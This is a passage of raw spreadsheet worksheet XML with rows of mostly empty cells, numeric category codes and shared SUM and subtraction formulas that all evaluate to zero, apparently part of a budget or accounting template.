      <c r="H1293" s="17"/>
      <c r="I1293" s="17"/>
      <c r="J1293" s="17"/>
      <c r="K1293" s="17"/>
      <c r="L1293" s="17"/>
      <c r="M1293" s="17"/>
      <c r="N1293" s="17"/>
      <c r="O1293" s="17"/>
      <c r="P1293" s="17"/>
      <c r="Q1293" s="17"/>
      <c r="R1293" s="17"/>
      <c r="S1293" s="17"/>
      <c r="T1293" s="17"/>
      <c r="U1293" s="17"/>
      <c r="V1293" s="17"/>
      <c r="W1293" s="17"/>
      <c r="X1293" s="17"/>
      <c r="Y1293" s="17"/>
      <c r="Z1293" s="17"/>
      <c r="AA1293" s="17"/>
      <c r="AB1293" s="17"/>
      <c r="AC1293" s="17"/>
      <c r="AD1293" s="17"/>
      <c r="AE1293" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AF1293" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AG1293" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AH1293" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AI1293" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AJ1293" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AK1293" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AL1293" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AM1293" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AN1293" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AO1293" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AP1293" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
    </row>
    <row r="1294" ht="18" customHeight="1" spans="1:42">
      <c r="A1294" s="10"/>
      <c r="B1294" s="10"/>
      <c r="C1294" s="28"/>
      <c r="D1294" s="10">
        <v>2240504</v>
      </c>
      <c r="E1294" s="16" t="s">
        <v>3998</v>
      </c>
      <c r="F1294" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1294" s="17"/>
      <c r="H1294" s="17"/>
      <c r="I1294" s="17"/>
      <c r="J1294" s="17"/>
      <c r="K1294" s="17"/>
      <c r="L1294" s="17"/>
      <c r="M1294" s="17"/>
      <c r="N1294" s="17"/>
      <c r="O1294" s="17"/>
      <c r="P1294" s="17"/>
      <c r="Q1294" s="17"/>
      <c r="R1294" s="17"/>
      <c r="S1294" s="17"/>
      <c r="T1294" s="17"/>
      <c r="U1294" s="17"/>
      <c r="V1294" s="17"/>
      <c r="W1294" s="17"/>
      <c r="X1294" s="17"/>
      <c r="Y1294" s="17"/>
      <c r="Z1294" s="17"/>
      <c r="AA1294" s="17"/>
      <c r="AB1294" s="17"/>
      <c r="AC1294" s="17"/>
      <c r="AD1294" s="17"/>
      <c r="AE1294" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AF1294" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AG1294" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AH1294" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AI1294" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AJ1294" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AK1294" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AL1294" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AM1294" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AN1294" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AO1294" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AP1294" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
    </row>
    <row r="1295" ht="18" customHeight="1" spans="1:42">
      <c r="A1295" s="10"/>
      <c r="B1295" s="10"/>
      <c r="C1295" s="28"/>
      <c r="D1295" s="10">
        <v>2240505</v>
      </c>
      <c r="E1295" s="16" t="s">
        <v>3999</v>
      </c>
      <c r="F1295" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1295" s="17"/>
      <c r="H1295" s="17"/>
      <c r="I1295" s="17"/>
      <c r="J1295" s="17"/>
      <c r="K1295" s="17"/>
      <c r="L1295" s="17"/>
      <c r="M1295" s="17"/>
      <c r="N1295" s="17"/>
      <c r="O1295" s="17"/>
      <c r="P1295" s="17"/>
      <c r="Q1295" s="17"/>
      <c r="R1295" s="17"/>
      <c r="S1295" s="17"/>
      <c r="T1295" s="17"/>
      <c r="U1295" s="17"/>
      <c r="V1295" s="17"/>
      <c r="W1295" s="17"/>
      <c r="X1295" s="17"/>
      <c r="Y1295" s="17"/>
      <c r="Z1295" s="17"/>
      <c r="AA1295" s="17"/>
      <c r="AB1295" s="17"/>
      <c r="AC1295" s="17"/>
      <c r="AD1295" s="17"/>
      <c r="AE1295" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AF1295" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AG1295" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AH1295" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AI1295" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AJ1295" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AK1295" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AL1295" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AM1295" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AN1295" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AO1295" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AP1295" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
    </row>
    <row r="1296" ht="18" customHeight="1" spans="1:42">
      <c r="A1296" s="10"/>
      <c r="B1296" s="10"/>
      <c r="C1296" s="28"/>
      <c r="D1296" s="10">
        <v>2240506</v>
      </c>
      <c r="E1296" s="16" t="s">
        <v>4000</v>
      </c>
      <c r="F1296" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1296" s="17"/>
      <c r="H1296" s="17"/>
      <c r="I1296" s="17"/>
      <c r="J1296" s="17"/>
      <c r="K1296" s="17"/>
      <c r="L1296" s="17"/>
      <c r="M1296" s="17"/>
      <c r="N1296" s="17"/>
      <c r="O1296" s="17"/>
      <c r="P1296" s="17"/>
      <c r="Q1296" s="17"/>
      <c r="R1296" s="17"/>
      <c r="S1296" s="17"/>
      <c r="T1296" s="17"/>
      <c r="U1296" s="17"/>
      <c r="V1296" s="17"/>
      <c r="W1296" s="17"/>
      <c r="X1296" s="17"/>
      <c r="Y1296" s="17"/>
      <c r="Z1296" s="17"/>
      <c r="AA1296" s="17"/>
      <c r="AB1296" s="17"/>
      <c r="AC1296" s="17"/>
      <c r="AD1296" s="17"/>
      <c r="AE1296" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AF1296" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AG1296" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AH1296" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AI1296" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AJ1296" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AK1296" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AL1296" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AM1296" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AN1296" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AO1296" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AP1296" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
    </row>
    <row r="1297" ht="18" customHeight="1" spans="1:42">
      <c r="A1297" s="10"/>
      <c r="B1297" s="10"/>
      <c r="C1297" s="28"/>
      <c r="D1297" s="10">
        <v>2240507</v>
      </c>
      <c r="E1297" s="16" t="s">
        <v>4001</v>
      </c>
      <c r="F1297" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1297" s="17"/>
      <c r="H1297" s="17"/>
      <c r="I1297" s="17"/>
      <c r="J1297" s="17"/>
      <c r="K1297" s="17"/>
      <c r="L1297" s="17"/>
      <c r="M1297" s="17"/>
      <c r="N1297" s="17"/>
      <c r="O1297" s="17"/>
      <c r="P1297" s="17"/>
      <c r="Q1297" s="17"/>
      <c r="R1297" s="17"/>
      <c r="S1297" s="17"/>
      <c r="T1297" s="17"/>
      <c r="U1297" s="17"/>
      <c r="V1297" s="17"/>
      <c r="W1297" s="17"/>
      <c r="X1297" s="17"/>
      <c r="Y1297" s="17"/>
      <c r="Z1297" s="17"/>
      <c r="AA1297" s="17"/>
      <c r="AB1297" s="17"/>
      <c r="AC1297" s="17"/>
      <c r="AD1297" s="17"/>
      <c r="AE1297" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AF1297" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AG1297" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AH1297" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AI1297" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AJ1297" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AK1297" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AL1297" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AM1297" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AN1297" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AO1297" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AP1297" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
    </row>
    <row r="1298" ht="18" customHeight="1" spans="1:42">
      <c r="A1298" s="10"/>
      <c r="B1298" s="10"/>
      <c r="C1298" s="28"/>
      <c r="D1298" s="10">
        <v>2240508</v>
      </c>
      <c r="E1298" s="16" t="s">
        <v>4002</v>
      </c>
      <c r="F1298" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1298" s="17"/>
      <c r="H1298" s="17"/>
      <c r="I1298" s="17"/>
      <c r="J1298" s="17"/>
      <c r="K1298" s="17"/>
      <c r="L1298" s="17"/>
      <c r="M1298" s="17"/>
      <c r="N1298" s="17"/>
      <c r="O1298" s="17"/>
      <c r="P1298" s="17"/>
      <c r="Q1298" s="17"/>
      <c r="R1298" s="17"/>
      <c r="S1298" s="17"/>
      <c r="T1298" s="17"/>
      <c r="U1298" s="17"/>
      <c r="V1298" s="17"/>
      <c r="W1298" s="17"/>
      <c r="X1298" s="17"/>
      <c r="Y1298" s="17"/>
      <c r="Z1298" s="17"/>
      <c r="AA1298" s="17"/>
      <c r="AB1298" s="17"/>
      <c r="AC1298" s="17"/>
      <c r="AD1298" s="17"/>
      <c r="AE1298" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AF1298" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AG1298" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AH1298" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AI1298" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AJ1298" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AK1298" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AL1298" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AM1298" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AN1298" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AO1298" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AP1298" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
    </row>
    <row r="1299" ht="18" customHeight="1" spans="1:42">
      <c r="A1299" s="10"/>
      <c r="B1299" s="10"/>
      <c r="C1299" s="28"/>
      <c r="D1299" s="10">
        <v>2240509</v>
      </c>
      <c r="E1299" s="16" t="s">
        <v>4003</v>
      </c>
      <c r="F1299" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1299" s="17"/>
      <c r="H1299" s="17"/>
      <c r="I1299" s="17"/>
      <c r="J1299" s="17"/>
      <c r="K1299" s="17"/>
      <c r="L1299" s="17"/>
      <c r="M1299" s="17"/>
      <c r="N1299" s="17"/>
      <c r="O1299" s="17"/>
      <c r="P1299" s="17"/>
      <c r="Q1299" s="17"/>
      <c r="R1299" s="17"/>
      <c r="S1299" s="17"/>
      <c r="T1299" s="17"/>
      <c r="U1299" s="17"/>
      <c r="V1299" s="17"/>
      <c r="W1299" s="17"/>
      <c r="X1299" s="17"/>
      <c r="Y1299" s="17"/>
      <c r="Z1299" s="17"/>
      <c r="AA1299" s="17"/>
      <c r="AB1299" s="17"/>
      <c r="AC1299" s="17"/>
      <c r="AD1299" s="17"/>
      <c r="AE1299" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AF1299" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AG1299" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AH1299" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AI1299" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AJ1299" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AK1299" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AL1299" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AM1299" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AN1299" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AO1299" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AP1299" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
    </row>
    <row r="1300" ht="18" customHeight="1" spans="1:42">
      <c r="A1300" s="10"/>
      <c r="B1300" s="10"/>
      <c r="C1300" s="28"/>
      <c r="D1300" s="10">
        <v>2240510</v>
      </c>
      <c r="E1300" s="16" t="s">
        <v>4004</v>
      </c>
      <c r="F1300" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1300" s="17"/>
      <c r="H1300" s="17"/>
      <c r="I1300" s="17"/>
      <c r="J1300" s="17"/>
      <c r="K1300" s="17"/>
      <c r="L1300" s="17"/>
      <c r="M1300" s="17"/>
      <c r="N1300" s="17"/>
      <c r="O1300" s="17"/>
      <c r="P1300" s="17"/>
      <c r="Q1300" s="17"/>
      <c r="R1300" s="17"/>
      <c r="S1300" s="17"/>
      <c r="T1300" s="17"/>
      <c r="U1300" s="17"/>
      <c r="V1300" s="17"/>
      <c r="W1300" s="17"/>
      <c r="X1300" s="17"/>
      <c r="Y1300" s="17"/>
      <c r="Z1300" s="17"/>
      <c r="AA1300" s="17"/>
      <c r="AB1300" s="17"/>
      <c r="AC1300" s="17"/>
      <c r="AD1300" s="17"/>
      <c r="AE1300" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AF1300" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AG1300" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AH1300" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AI1300" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AJ1300" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AK1300" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AL1300" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AM1300" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AN1300" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AO1300" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AP1300" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
    </row>
    <row r="1301" ht="18" customHeight="1" spans="1:42">
      <c r="A1301" s="10"/>
      <c r="B1301" s="10"/>
      <c r="C1301" s="28"/>
      <c r="D1301" s="10">
        <v>2240550</v>
      </c>
      <c r="E1301" s="16" t="s">
        <v>4005</v>
      </c>
      <c r="F1301" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1301" s="17"/>
      <c r="H1301" s="17"/>
      <c r="I1301" s="17"/>
      <c r="J1301" s="17"/>
      <c r="K1301" s="17"/>
      <c r="L1301" s="17"/>
      <c r="M1301" s="17"/>
      <c r="N1301" s="17"/>
      <c r="O1301" s="17"/>
      <c r="P1301" s="17"/>
      <c r="Q1301" s="17"/>
      <c r="R1301" s="17"/>
      <c r="S1301" s="17"/>
      <c r="T1301" s="17"/>
      <c r="U1301" s="17"/>
      <c r="V1301" s="17"/>
      <c r="W1301" s="17"/>
      <c r="X1301" s="17"/>
      <c r="Y1301" s="17"/>
      <c r="Z1301" s="17"/>
      <c r="AA1301" s="17"/>
      <c r="AB1301" s="17"/>
      <c r="AC1301" s="17"/>
      <c r="AD1301" s="17"/>
      <c r="AE1301" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AF1301" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AG1301" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AH1301" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AI1301" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AJ1301" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AK1301" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AL1301" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AM1301" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AN1301" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AO1301" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AP1301" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
    </row>
    <row r="1302" ht="18" customHeight="1" spans="1:42">
      <c r="A1302" s="10"/>
      <c r="B1302" s="10"/>
      <c r="C1302" s="28"/>
      <c r="D1302" s="10">
        <v>2240599</v>
      </c>
      <c r="E1302" s="16" t="s">
        <v>4006</v>
      </c>
      <c r="F1302" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1302" s="17"/>
      <c r="H1302" s="17"/>
      <c r="I1302" s="17"/>
      <c r="J1302" s="17"/>
      <c r="K1302" s="17"/>
      <c r="L1302" s="17"/>
      <c r="M1302" s="17"/>
      <c r="N1302" s="17"/>
      <c r="O1302" s="17"/>
      <c r="P1302" s="17"/>
      <c r="Q1302" s="17"/>
      <c r="R1302" s="17"/>
      <c r="S1302" s="17"/>
      <c r="T1302" s="17"/>
      <c r="U1302" s="17"/>
      <c r="V1302" s="17"/>
      <c r="W1302" s="17"/>
      <c r="X1302" s="17"/>
      <c r="Y1302" s="17"/>
      <c r="Z1302" s="17"/>
      <c r="AA1302" s="17"/>
      <c r="AB1302" s="17"/>
      <c r="AC1302" s="17"/>
      <c r="AD1302" s="17"/>
      <c r="AE1302" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AF1302" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AG1302" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AH1302" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AI1302" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AJ1302" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AK1302" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AL1302" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AM1302" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AN1302" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AO1302" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
      <c r="AP1302" s="17">
        <f t="shared" si="606"/>
        <v>0</v>
      </c>
    </row>
    <row r="1303" ht="18" customHeight="1" spans="1:42">
      <c r="A1303" s="10"/>
      <c r="B1303" s="10"/>
      <c r="C1303" s="28"/>
      <c r="D1303" s="10">
        <v>22406</v>
      </c>
      <c r="E1303" s="11" t="s">
        <v>4007</v>
      </c>
      <c r="F1303" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1303" s="12">
        <f t="shared" ref="G1303:R1303" si="607">SUM(G1304:G1306)</f>
        <v>0</v>
      </c>
      <c r="H1303" s="12">
        <f t="shared" si="607"/>
        <v>0</v>
      </c>
      <c r="I1303" s="12">
        <f t="shared" si="607"/>
        <v>0</v>
      </c>
      <c r="J1303" s="12">
        <f t="shared" si="607"/>
        <v>0</v>
      </c>
      <c r="K1303" s="12">
        <f t="shared" si="607"/>
        <v>0</v>
      </c>
      <c r="L1303" s="12">
        <f t="shared" si="607"/>
        <v>0</v>
      </c>
      <c r="M1303" s="12">
        <f t="shared" si="607"/>
        <v>0</v>
      </c>
      <c r="N1303" s="12">
        <f t="shared" si="607"/>
        <v>0</v>
      </c>
      <c r="O1303" s="12">
        <f t="shared" si="607"/>
        <v>0</v>
      </c>
      <c r="P1303" s="12">
        <f t="shared" si="607"/>
        <v>0</v>
      </c>
      <c r="Q1303" s="12">
        <f t="shared" si="607"/>
        <v>0</v>
      </c>
      <c r="R1303" s="12">
        <f t="shared" si="607"/>
        <v>0</v>
      </c>
      <c r="S1303" s="12">
        <v>0</v>
      </c>
      <c r="T1303" s="12">
        <v>0</v>
      </c>
      <c r="U1303" s="12">
        <v>0</v>
      </c>
      <c r="V1303" s="12">
        <v>0</v>
      </c>
      <c r="W1303" s="12">
        <v>0</v>
      </c>
      <c r="X1303" s="12">
        <v>0</v>
      </c>
      <c r="Y1303" s="12">
        <v>0</v>
      </c>
      <c r="Z1303" s="12">
        <v>0</v>
      </c>
      <c r="AA1303" s="12">
        <v>0</v>
      </c>
      <c r="AB1303" s="12">
        <v>0</v>
      </c>
      <c r="AC1303" s="12">
        <v>0</v>
      </c>
      <c r="AD1303" s="12">
        <v>0</v>
      </c>
      <c r="AE1303" s="12">
        <f t="shared" ref="AE1303:AP1303" si="608">SUM(AE1304:AE1306)</f>
        <v>0</v>
      </c>
      <c r="AF1303" s="12">
        <f t="shared" si="608"/>
        <v>0</v>
      </c>
      <c r="AG1303" s="12">
        <f t="shared" si="608"/>
        <v>0</v>
      </c>
      <c r="AH1303" s="12">
        <f t="shared" si="608"/>
        <v>0</v>
      </c>
      <c r="AI1303" s="12">
        <f t="shared" si="608"/>
        <v>0</v>
      </c>
      <c r="AJ1303" s="12">
        <f t="shared" si="608"/>
        <v>0</v>
      </c>
      <c r="AK1303" s="12">
        <f t="shared" si="608"/>
        <v>0</v>
      </c>
      <c r="AL1303" s="12">
        <f t="shared" si="608"/>
        <v>0</v>
      </c>
      <c r="AM1303" s="12">
        <f t="shared" si="608"/>
        <v>0</v>
      </c>
      <c r="AN1303" s="12">
        <f t="shared" si="608"/>
        <v>0</v>
      </c>
      <c r="AO1303" s="12">
        <f t="shared" si="608"/>
        <v>0</v>
      </c>
      <c r="AP1303" s="12">
        <f t="shared" si="608"/>
        <v>0</v>
      </c>
    </row>
    <row r="1304" ht="18" customHeight="1" spans="1:42">
      <c r="A1304" s="10"/>
      <c r="B1304" s="10"/>
      <c r="C1304" s="28"/>
      <c r="D1304" s="10">
        <v>2240601</v>
      </c>
      <c r="E1304" s="16" t="s">
        <v>4008</v>
      </c>
      <c r="F1304" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1304" s="17"/>
      <c r="H1304" s="17"/>
      <c r="I1304" s="17"/>
      <c r="J1304" s="17"/>
      <c r="K1304" s="17"/>
      <c r="L1304" s="17"/>
      <c r="M1304" s="17"/>
      <c r="N1304" s="17"/>
      <c r="O1304" s="17"/>
      <c r="P1304" s="17"/>
      <c r="Q1304" s="17"/>
      <c r="R1304" s="17"/>
      <c r="S1304" s="17"/>
      <c r="T1304" s="17"/>
      <c r="U1304" s="17"/>
      <c r="V1304" s="17"/>
      <c r="W1304" s="17"/>
      <c r="X1304" s="17"/>
      <c r="Y1304" s="17"/>
      <c r="Z1304" s="17"/>
      <c r="AA1304" s="17"/>
      <c r="AB1304" s="17"/>
      <c r="AC1304" s="17"/>
      <c r="AD1304" s="17"/>
      <c r="AE1304" s="17">
        <f t="shared" ref="AE1304:AP1306" si="609">G1304-S1304</f>
        <v>0</v>
      </c>
      <c r="AF1304" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AG1304" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AH1304" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AI1304" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AJ1304" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AK1304" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AL1304" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AM1304" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AN1304" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AO1304" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AP1304" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
    </row>
    <row r="1305" ht="18" customHeight="1" spans="1:42">
      <c r="A1305" s="10"/>
      <c r="B1305" s="10"/>
      <c r="C1305" s="28"/>
      <c r="D1305" s="10">
        <v>2240602</v>
      </c>
      <c r="E1305" s="16" t="s">
        <v>4009</v>
      </c>
      <c r="F1305" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1305" s="17"/>
      <c r="H1305" s="17"/>
      <c r="I1305" s="17"/>
      <c r="J1305" s="17"/>
      <c r="K1305" s="17"/>
      <c r="L1305" s="17"/>
      <c r="M1305" s="17"/>
      <c r="N1305" s="17"/>
      <c r="O1305" s="17"/>
      <c r="P1305" s="17"/>
      <c r="Q1305" s="17"/>
      <c r="R1305" s="17"/>
      <c r="S1305" s="17"/>
      <c r="T1305" s="17"/>
      <c r="U1305" s="17"/>
      <c r="V1305" s="17"/>
      <c r="W1305" s="17"/>
      <c r="X1305" s="17"/>
      <c r="Y1305" s="17"/>
      <c r="Z1305" s="17"/>
      <c r="AA1305" s="17"/>
      <c r="AB1305" s="17"/>
      <c r="AC1305" s="17"/>
      <c r="AD1305" s="17"/>
      <c r="AE1305" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AF1305" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AG1305" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AH1305" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AI1305" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AJ1305" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AK1305" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AL1305" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AM1305" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AN1305" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AO1305" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
      <c r="AP1305" s="17">
        <f t="shared" si="609"/>
        <v>0</v>
      </c>
    </row>
    <row r="1306" ht="18" customHeight="1" spans="1:42">
      <c r="A1306" s="10"/>
      <c r="B1306" s="10"/>
      <c r="C1306" s="28"/>
      <c r="D1306" s="10">
        <v>2240699</v>
      </c>
      <c r="E1306" s="16" t="s">
        <v>4010</v>
      </c>
      <c r="F1306" s="14">
        <f t="shared" si="603"/>
        <v>0</v>
      </c>
      <c r="G1306" s="17"/>
      <c r="H1306" s="17"/>
      <c r="I1306" s="17"/>
      <c r="J1306" s="17"/>
      <c r="K1306" s="17"/>
